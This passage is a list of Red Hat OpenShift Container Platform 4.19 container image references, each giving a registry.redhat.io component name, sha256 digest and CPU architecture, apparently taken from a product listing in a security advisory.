"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:66745a12cf917414d197c589e7e57a62958da4c66d5372e848e40568d8ddfafc_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:900e5ff2f8ea86f0864c6a3cd1707a620427189f5bfffa0bb0ea9a8c0ed85330_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:c029ff100811f13c0ba79c03044e0c6f096567511c336e4d1ecced6e900c2acd_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:37fe6420e98e7d1927492a7a40fd01578cfaf441530b7bf2f85cc7d593d7b097_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:480d7e114879e0c9bcfd62250af7f2f7b4a25e7d4cca65d97c422349fe164334_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:6f49794879ad8a54b4a9ba77661ebdf84cb90a048d1472c1f878c10a9ecc46e6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:77c778debce0cb2eff5f5e66a3db3e30905e0138de3ddc3cd5330d2a79ec2cf9_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:6aef6b3ea8ceb252107d24252c9c155e21d42825343e2a824d869f897a86da4f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:895cb0d9b4715a75c1ffa4539bbd86c14f774e664ab16f5df4bc3e55ef537225_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:99fc0e641a6014bad4027471174578ba22c0a4a99c05b6bca1e8c838bbda0a90_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:aee32f17c4c4aa3deaca4a1884efc7c1a05d4fdadea145b247c4364e9e82086a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:07f2b6c01f22078c6b6eea7916982ebfcf6f992daf0d80af7b18972e6c484868_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:3efbeb0ba231cc16b69a86c43c28aa02b7e773413b361ceaf82c72cb215dc187_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:a212996fe27771f82406dc36d68e07e29ecf975834c3cde6395b35cd259edbe9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:b7f1f48335150e9e3ff89c0c349345f2c7fb6d7cf27793d263cca791d53f260c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:39852b09d2ff95f03cff6f39398c67d30d64366f00a0ca73319d81831b7f6e23_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:6d2dbe2a871324b770da093074a9fcac3aa590896e366354f8202bf80eae70ed_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:9df2c55943c62172a5ab42fcd2309a232a8e455240efeba614e2e70308972764_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:e6aaec6333f15e8aa67ad391f57eb7225007c068947982d18fea6b90d837e6e2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:02c4fe2761b586f29c78d9419f0b90d98bee92b8d4fa47ec77dfe45795fab7fb_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:4b1a4e3c67e3fc5c14a8cb7130eec3ea191f27473942f7afb09b497a30236947_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:a9e099fe57f31d4e86d0edbad9605aae421fbe410d1b7c2f6e7036940ba5e319_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:e3504f1bb6b8b89f4f01ecefc3c8646cbc949d638bfa6db0638476731d9f0e96_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-rhel9@sha256:1cdfe759fe6d9b1745276957b712c1a46a69ce1c59706a7ba9ca8f3f89cc844d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-rhel9@sha256:2fafd2b4c0fb8500c0180c767e55f70d26203e68500e64d252fe3a10227a161a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-rhel9@sha256:5a96f6965efd6579efde9b1a1b4ae88b57cbb49f38cf2a39ef90a55470a30667_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-rhel9@sha256:95c126293ef394a5ce8882e8cfa9c6f6c22e9cae79e64e07f0e1e57a8fb55211_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:4e885357cb52fffbb832d31d97400cfc629f26d5c38b4692379d08ba485f46d2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:645168f7cb91679d374bc1e431181a1b964dec279265ec52e5809b368e08654c_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:7c20e19cdbb62a268ffea39d5e0004fb4e6b587c41250c73180043f56b9fe0e5_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:c17396793e30858f900b68ed2981f38062d501b7600a5e4ca127d4e14113aca4_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:56453e8ce0dbb39d0259d2f0b36f58d8f049bf6c1a880b8a1eaa37d8ade32067_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:6513461d1b413d648dc1d2327fac029633f5d34322459f2752d1096648fa37b4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:9a083427c52dcc2f9716408cf23991613eef7c41fb6eb1ee4841491276971039_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:dcfe6ab706950430187a24e9792b6f0c270f813841e799ea7e35623679269ae5_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:334e975b0d8a94ec45ade469bf86809c9a07e9456cda5d5c71d6f91a2877faa0_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:64dfc7beaf3a8cfdab85ba963db74971ca68b6cf614aa04279f4af3239806e4c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:7b99d625b14ced1fd44520bd106906dd60f84e7794257fe3b4d3a3aa685ebbbc_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:8b854d27a269e0f6b6d542f652c504ab0678ac18d1b84db63078257eebe090cf_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:2601add0c23c9e27079274736508adab64c6ae4128f66a53df3f569fe2d9fe3f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:6917cb0e3b073a13ec29e5c329f01cf2ec26e78d47c3c8360d0063d186a4ba53_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:a400d84e7f46869a2c2f75b6f221684879b680910b5e5e4662e074a020483cf4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:d94b765497d2fa316fbf4ec374572a5fba96a99b78dfe02b6ed6986e2b7782e6_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:26b8049bd1a84ed402fad985ca842bf91ba86fbc5e46f7dea0050120ca551643_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:4c28562416c8308c00af299859adfd3cfb4ef790ef2b6668299dc487c6fa3f45_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:645feaaa568676e0c2b1c620a81a1a60d321800b940d46d2514aa59e1f25e2c9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:78bdc6e0ac3da2daf1f39e07c6554ac500deec9670561477f9cf0a346e1145bf_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:59b6c20394bfa15bb36a9ac9b4ef03ae6bdadfcfd110c46fee13ac2abc9f6fa3_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:79a30df8b6d7ef52409a3145663550ccf0fbde7e5bffc7e91ccefe2f276e44af_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:9324047c73a33a920fe6403604cd123f81dc7663c4780934f4da3b95f0bb5bac_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:960007197db71f1b34bdeadf7bc13323cff680b273f795dfcffc569867f695b2_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:0685735bcfb4c4a112c1796dcfccf10233e0e62e1538520aa6e02abf8dd88c27_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:12bfb2d2bbc5c7bbf8a161f97c1521d0a5c7ef8ad6e3aca825e62cf066a51109_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:d9a9c57749c9d3e56e51d0b67ac5929949a900b1e6c96a4414366afc1ef4ba3b_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:f3650443d49b825783ed4f308ff994be4b24c86dee1e2825274d58e0d4b02a28_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:9d90ec3d15ade36e666eee154f9b934259cf811b4a9f987ef18300b78bbe35d3_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:9feb86c7f0170dfae9273fe7e3ba662b7333ce8d05ee411b9e7d9c82447b2f2c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:a1bc835a8621c88b52ddff53d6701b5cefe7cc6f2efb80836c239cb333945043_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:e53bfa8ab4ae569c697bba0b37c25afb495cc6cf324fb4ed50bd8ffc737c04f9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:1264333969e9e7825b6ece8ed3a80a3eeac54564ae51d2aed817e4028fbef931_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:aa2f9d5b3b26615c429128234a5dea3cfa7f4f6d5ce3d9d4e6bf6796bafbb50b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:b2115e5268813615088ca48f0138ff6910b07513be4177cd74485d2d41f0e249_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:c8e791718d7e4a68571b873bd0c68aeffc217fe69ee7e74741ecda295fb67dbd_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:290f5dcc66373ff79cbcda33e6fbba989c48ae2bf8b623c57e065110e36524db_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:572cc6f2f303a9190588696d5bdc80fca9ac3c32d5de9c5d94a27861c871a1c5_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:d1561efe3cc68b60fbfc765e028dee3cf4a7666dc499f028c98603075d99a9d7_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:e04cc25c77ffb05e86a6fea6dc8a6e5c35563612305adbcb98cd0b4832c97ed1_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:96fdf677680bf809356060d0af7fc9166608de5dc4d546e671f3071910558381_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:a13951576eb84ab6c6d3b800976320f8bebadad21e49b38faa99e8d1adcc520f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:a8ce501ca7269a42fbb749fd0d3adb03c49468282e1f41e483e569c8acc1f777_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:cd0bb571991f485f4f33aadb8434e1d5e3b6c3bf7ac4e1e62994de0b190b6ec6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:0c5df10c40e0bfbed23f193b9aedaf953a5e1e3f4cbbe5f1924866d1ec7f55cf_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:4cdff720094bd0b07e3dd6ae9b5b88756a890fd1ac39361629c44817766fe69e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:b28fe78ee564e859188499e768d57e3e0fe2ad0afb715b0d76ce0c99960f3cd1_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:eb91a50e029bf839ff7be93783acbbd5ea72ba6f3bf9f9dc10c0588c23280f51_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:0ac703dd7441374f349bfeb3639c1a7e364c9764aeb4b9ac05ea7879cce4a5a1_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:4b6155be40a57801b21c44a7b50f89801b15dba8a51dad03969b25bee1a22b6b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:adedcc1ce23f14f3759818cddb9dbbe73dc1f772e3b58e229433f7b6e2f0f5b8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:e81081ad64219f09b1eef538df2903264d087d898aa81bebb6634fe4342efc59_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:5185785b29d581adb9e8ed4e23ba11c7d67090f4c6e59b0287d2a36c83fd8ae1_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:582a1302e53fa201431ccd497816d939ed23590d6d4128cb281a03fcf90f9475_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:5d920d843fb0958a750b86ee532642adc3a77f5e060d54cfa5327e4f41465772_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:cfe7eed06e5855c82c72a26bad2c2354091e94c51b692637cd8e79027ea6742a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:73738cc655778a94527afe3ae48c4ca932590e4f78f03811f70d2d35f5090d3e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:9673f610031257e254dc32e569b3471168e5c18a352ad5bddc9bd51e686eb4e6_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:e61ccfe3880e902a0e1cb9e718f62cbf57ce70435092f90f19e441fba2e899d1_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:f66818672229085d1982f4b0053c75d26e6faa4893331f6024b33f953426339d_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:1d89f84175f9a72d05074562aeacda38b9047a99974a186a8a4d2d72e20c92f1_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:3e6c6be12aadf59c05c9a2da262846e6a44be09351ad81b8891fefa6a3f93f2c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:cf1445e8c39362b8c0b4b29d56771dcdb15f99c71e922e3fddd6b1f7e7b275bc_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:d83d30e35ee380e6003d2ee8b5a56a21ea892037b978273d1ff4a8e1ce88c360_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:2ae0fbcbb1b67e11e64b526fae84e06219478f5ea8e474223525cfd4ebd8a39f_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:41acc32b9acd74f09fb1e01b77c0fa3c64a891c96cf2549b54b6e0d43411ffb2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:669266c0b82317a24e2160b8294fd598a8b24f0053e22358e90eaa5fddb527ff_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:dd57d49a58a5111f6d067a3a943c9ac9b5a175972312dd83d5fbd224511c0d99_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:4653cd829513c12b1aa11c156b76a06d1d6dfbcd486a9045f5e58d295ce0a616_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:636cac46aae879046a02123b395762387762e921c02421fbeac623feace69c70_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:8df5c2a7eca23f5a88c99db98340446c2c0d2be2ccf22a62753e955a9da54fd5_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:e0db3311e3862b0fd875d6da134be4cdb3ff6d032591632c35b71aeba2cd6e3d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-cluster-api-rhel9-operator@sha256:30a687482b427b9d447430e0e7ef60e310b9dae5032407b03da36d7795e134c9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-cluster-api-rhel9-operator@sha256:42777662e34fa44925901dd1b8aa9537a389c167557b6287e1b01f13675363cb_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-cluster-api-rhel9-operator@sha256:46a134239b3b4a2792fe663a645b0c5d01a48c7db7d9c0fc71dd50c96d2fbbc4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-cluster-api-rhel9-operator@sha256:7b8211056c73804d6072ec729c67cb6e77042e517009b53a0a420efb1a3893dc_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:0c307a3ef1df661bd3a634fd40ea47de440bf061f2f1631a430b61f6426903c9_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:9ba38f81d114b4fa4e3523ec46ce02bdcd4b5a122d399968bb7d6f8eb8bba271_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:bf98482d9796579be39293dcb59f424e87eff66f1af285ce773cb61b7eb7c7d7_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:fe63945e16c13db6513a214e52c7df6e510806faa3548b5c5658ae4d1c30176b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:48460c041bdffd7940cb9abb2385a6eb9eda698d1155a6e11d948336fb4c81eb_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:9c67187eef0b78888e5299143dac7efa69d6c06fa44b9db0a92d4447f7333a0a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:d0fd4fb6c3aada9546a70b24740460db48607ec9333155e04b233b7acf92bde2_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:eb5cee38879cba152e5979d2ec6db64e2cef6bba8dd82cbd18461aa2af072282_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:047391c0706f4f8c7a8c09598ed4d2900c9154cba66f633dc2df220941e978d6_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:3344aa2c937d0e7c24f5f7394a50bba34179fa527f9d7492b951f81fce3ac9c4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:9073193ac055f63809d630f43508c41c2fa3bf07d6ca023667fd9fda5daf6117_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:be277357a0ad4546a23c375494eaff76ba1af97f8d77bce6d21ab722d990f749_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:2fc0e9d7cfb095ef01f513ca422a0dbd2b3fa31f8a46b8ed679550d77f3df2fa_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:4b1651037396367c71bfff638a9a8ef32aac4c570389b4d5d95a992d9eb44876_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:4e46a01af9e94831db7732d4747ffa011a3e634792c2076628ba225bce1baafe_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:c5093213a910684e94394a0bb9f931c2b62dce522bf1926e0dbf17220d166d3a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:1fc4a052d1a2f71ad6d2bbf61e0a1037f7e2440debd131eace7d32d0fab11cee_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:54ae01b23db949ca63116514359f1d2bd5a7f7d44b3578fc821d432c4da95e68_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:7bb48785d9f7c7fbbdfea41e890259a9d3bc31fa5676bad18d497aa77da498c4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:e3c50d3961173a74abdcd965f0ddf63bca5688a0ae2efece117108cbd0dff616_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:accb268a968dd5bc57d1252a01fe3595bc021d13a5f06f56d2e5a117b1d2c1f4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:b508a70e9653143eea20c73de1605c56286a9762ce0090310955e036ea176ca2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:bd5db1b792183d1ca64dd35d5ca0239b2283b61bf1e01b95efa15f6053761b89_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:d1395c330a8fae9d244430dcdeb377c9f11e1f52c0e2ea18a3347cbc981e2dbe_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:0f5213491694928368f537b0484d07f929f8849470db7ac791ae672dda916aed_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:274f0a198e8abfb43cb903534311f3e8a29cf44de59ce1768ea5f252aa9593de_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:575db31ee7397addf620644e731075e091daf9d967fa3e1b5aa916596f9025b6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:acebc3ebf8ae744a19fbf05555531c66f567364b2cacdcde9b3ef57f35cc5bd2_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:0df81a471b525e99a5084cd3fdd23a75f9df9f1916944e877c264f35bce94b8f_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:3a37459b3a961cc1b3f3e64198885b19dd30f013b885af167ad52eb82dc1bb5f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:4ca3976b2c2e300c52d742522bbe52e8d351bd689d60e9e8f5c8825ec711520b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:97f61670284c2a539430a564cf572ef2af3ac96ace4c8b9aeb126989c6759abd_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:089ee476ddc1e24bcd421536afea9b800bab93bf4ad5f507109b84b6520b5126_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:5887e28e667ecdf6d9df4bfad8722e18cdf691806f4ee7f2c2e48f14b5d8b3c9_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:b654d350a87e6e4b6a217bfc59909cbc7d1e5a4359d1c7fd18b733dfaa992a48_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:cff13d6aed7130ce1277bb14c7cc2320e317aa46b7488c5c25a0df1e1d4074c4_ppc64le",
